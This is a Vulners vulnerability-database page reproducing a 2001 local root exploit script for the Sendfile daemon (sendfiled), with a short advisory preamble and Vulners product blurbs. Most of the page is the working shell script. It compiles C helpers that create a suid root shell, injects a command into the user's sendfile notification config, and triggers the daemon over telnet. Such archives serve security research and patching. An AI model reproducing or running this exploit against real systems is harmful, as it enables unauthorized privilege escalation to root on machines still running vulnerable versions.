Vulners
Lucene search
Sendfile 1.x/2.1 - Forced Privilege Lowering Failure
source: https://www.securityfocus.com/bid/2652/info
Sendfile is an implementation of the SAFT (simple asynchronous file transfer) protocol for UNIX systems.
A serialization error exists in the Sendfile daemon, sendfiled. When used in conjunction with other problems found in the daemon, it may be possible for a local user to execute arbitrary commands as root and gain elevated privileges.
#!/bin/sh
#
# sfdnfy - Sendfile daemon local arbitrary command execution vulnerability
#
# references:
# https://www.securityfocus.com/bid/2652
# https://www.securityfocus.com/bid/2631
#
# 04/24/01 psheep
SFUSER=$USER
SFHOST=localhost
SFPORT=saft
SFSPOOL=/var/spool/sendfile
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
echo "Sendfile daemon local arbitrary command execution vulnerability"
echo
echo " username = $SFUSER"
echo " spool directory = $SFSPOOL"
echo " config file = $SFUSERCFG"
echo " target hostname = $SFHOST"
echo " target port = $SFPORT"
echo
if ! test -d $SFSPOOL; then
echo "** unable to locate the sendfile spool directory, exiting"
exit 1
fi
sfsavedcfg="no"
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
echo "** attempting to create sendfile spool directory for $SFUSER"
echo
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
echo
else
if test -f $SFUSERCFG; then
echo "** backing up your sendfile daemon configuration file"
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
sfsavedcfg="yes"
fi
fi
cat > sfdnfy.c << EOF
#include <unistd.h>
#include <stdlib.h>
int main() {
setreuid(0,0);
setgid(0);
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
}
EOF
cat > sfdsh.c << EOF
#include <unistd.h>
int main() {
setreuid(0,0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling helper application as $PWD/sfdnfy"
cc -o $PWD/sfdnfy $PWD/sfdnfy.c
if ! test -x $PWD/sfdnfy; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** compiling shell wrapper as $PWD/sfdsh"
cc -o $PWD/sfdsh $PWD/sfdsh.c
if ! test -x $PWD/sfdsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** inserting commands into temporary configuration file"
echo "notification = mail $USER;$PWD/sfdnfy" >$SFUSERCFG
echo "** attempting attack against sendfile daemon..."
echo
(sleep 1;cat << EOF
FROM $USER
TO $USER
FILE boom$RANDOM
SIZE 0 0
DATA
FILE boom$RANDOM
SIZE 1 0
DATA
EOF
sleep 2) | telnet $SFHOST $SFPORT
echo
if test "x$sfsavedcfg" = xyes; then
echo "** restoring backed up configuration file"
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
else
echo "** removing temporary configuration file"
rm $SFUSERCFG
fi
echo "** done, the shell wrapper should be suid root after the mailer is done"
echo
exit 1Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Apr 2001 00:00Current
7.4High risk
Vulners AI Score7.4